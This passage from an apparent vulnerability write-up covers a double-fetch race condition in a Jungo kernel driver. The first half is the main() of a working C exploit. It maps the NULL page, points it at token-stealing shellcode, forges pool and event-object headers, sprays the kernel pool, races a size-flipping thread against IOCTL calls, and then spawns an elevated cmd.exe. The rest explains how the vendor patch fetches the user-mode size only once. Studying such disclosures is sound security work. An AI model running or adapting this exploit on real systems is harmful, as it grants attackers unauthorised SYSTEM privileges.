    new_count = current_priv-&gt;PrivilegeCount;

    HeapFree(GetProcessHeap(), 0, current_priv);
    CloseHandle(htoken);

    temp = old_count;       //store the old count
    *updated_count = new_count; //update the count 
    if (new_count &gt; old_count)
    {
        printf("[+] We now have %d privileges\n", new_count);
        return TRUE;
    }
    else
        return FALSE;
}

int main()
{
    HANDLE h_flip_thread;
    HANDLE h_ioctl_thread;
    HANDLE handle_arr[SPRAY_SIZE] = { 0 };
    DWORD mask = 0;
    DWORD orig_priv_count = 0;
    char *user_buff;
    
    check_priv_count(-1, &orig_priv_count);
    printf("[+] Original priv count: %d\n", orig_priv_count);

    if (!map_null_page())
    {
        return -1;
    }

    *(ULONG *)0x74 = (ULONG)&TokenStealingShellcode;

    user_buff = (char *)VirtualAlloc(NULL,
        0x1000,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_NOCACHE | PAGE_READWRITE);

    if (user_buff == NULL)
    {
        printf("[x] Couldn't allocate memory for buffer\n");
        return -1;
    }
    memset(user_buff, 0x41, 0x1000);

    *(ULONG *)(user_buff + 0x34) = 0x00000052; //set the size initially to 0x51

    //pool header block
    *(ULONG *)(user_buff + 0x374) = 0x04080070; //ULONG1
    *(ULONG *)(user_buff + 0x378) = 0xee657645;//PoolTag

    //QuotaInfo block
    *(ULONG *)(user_buff + 0x37c) = 0x00000000; //PagedPoolCharge
    *(ULONG *)(user_buff + 0x380) = 0x00000040; //NonPagedPoolCharge
    *(ULONG *)(user_buff + 0x384) = 0x00000000; //SecurityDescriptorCharge
    *(ULONG *)(user_buff + 0x388) = 0x00000000; //SecurityDescriptorQuotaBlock

    //Event header block
    *(ULONG *)(user_buff + 0x38c) = 0x00000001; //PointerCount
    *(ULONG *)(user_buff + 0x390) = 0x00000001; //HandleCount
    *(ULONG *)(user_buff + 0x394) = 0x00000000; //NextToFree
    *(ULONG *)(user_buff + 0x398) = 0x00080000; //TypeIndex &lt;--- NULL POINTER
    *(ULONG *)(user_buff + 0x39c) = 0x867b3940; //objecteCreateInfo
    *(ULONG *)(user_buff + 0x400) = 0x00000000;
    *(ULONG *)(user_buff + 0x404) = 0x867b3940; //QuotaBlockCharged



    /*
    * create a suspended thread for flipping, passing in a pointer to the size at user_buff+0x34
    * Set its priority to highest.
    * Set its mask so that it runs on a particular core.
    */
    h_flip_thread = CreateThread(NULL, 0, flip_thread, user_buff + 0x34, CREATE_SUSPENDED, 0);
    SetThreadPriority(h_flip_thread, THREAD_PRIORITY_HIGHEST);
    SetThreadAffinityMask(h_flip_thread, 0);
    ResumeThread(h_flip_thread);
    printf("[+] Starting race...\n");

    spray_pool(handle_arr);

    while (TRUE)
    {
        h_ioctl_thread = CreateThread(NULL, 0, ioctl_thread, user_buff, CREATE_SUSPENDED, 0);
        SetThreadPriority(h_ioctl_thread, THREAD_PRIORITY_HIGHEST);
        SetThreadAffinityMask(h_ioctl_thread, 1);
        
        ResumeThread(h_ioctl_thread);
        
        WaitForSingleObject(h_ioctl_thread, INFINITE);

        free_events(handle_arr); //free the event objects 

        if (check_priv_count(orig_priv_count, &orig_priv_count))
        {
            printf("[+] Breaking out of loop, popping shell!\n");
            break;
        }
        //pool header block
        *(ULONG *)(user_buff + 0x374) = 0x04080070; //ULONG1
        *(ULONG *)(user_buff + 0x378) = 0xee657645;//PoolTag

                                                   //QuotaInfo block
        *(ULONG *)(user_buff + 0x37c) = 0x00000000; //PagedPoolCharge
        *(ULONG *)(user_buff + 0x380) = 0x00000040; //NonPagedPoolCharge
        *(ULONG *)(user_buff + 0x384) = 0x00000000; //SecurityDescriptorCharge
        *(ULONG *)(user_buff + 0x388) = 0x00000000; //SecurityDescriptorQuotaBlock

                                                    //Event header block
        *(ULONG *)(user_buff + 0x38c) = 0x00000001; //PointerCount
        *(ULONG *)(user_buff + 0x390) = 0x00000001; //HandleCount
        *(ULONG *)(user_buff + 0x394) = 0x00000000; //NextToFree
        *(ULONG *)(user_buff + 0x398) = 0x00080000; //TypeIndex &lt;--- NULL POINTER
        *(ULONG *)(user_buff + 0x39c) = 0x867b3940; //objecteCreateInfo
        *(ULONG *)(user_buff + 0x400) = 0x00000000;
        *(ULONG *)(user_buff + 0x404) = 0x867b3940; //QuotaBlockCharged

        
        spray_pool(handle_arr);
    }

    system("cmd.exe");

    return 0;
}

THE PATCH

Jungo provided a patch for this vulnerability relatively quickly. The simplest way to mitigate against double fetch vulnerabilities is to quite obviously only fetch values from usermode once, storing said value in a local (kernel space) variable.

A quick analysis of the patch provided shows us that this is what has been implemented, starting in the IOCTL handler, we see the following:

This is much different to the vulnerable code, the size value passed from our user space buffer is stored in ecx and then pushed as an argument to sub_419CA2 (the actual value being multiplied by 0xa and having 0x3A added to it). Now in sub_419CA2, we see that whilst the user mode buffer is referenced multiple times, the actual size value (at user_buff+0x34) is never fetched.

We see here at the start of the function for example, that the argument pushed on the stack is fetched, which we do not have control over in user mode. Note also the hardcoded size value of 0x800, this also fixes the previously mentioned integer overflow.

Finally, in the vulnerable copying loop:

For reference, arg_4 is the size we passed ([user_buff+0x34] * 0xa + 0x3A), ebx is the pool buffer (which has a size of [user_buff+0x34] * 0xa + 0x48) and edi is the user buffer. Again we can see here that the value is being fetched from the stack frame of the function, which mitigates the vulnerability present in the previous version.

EPSS

0.001

Percentile

35.4%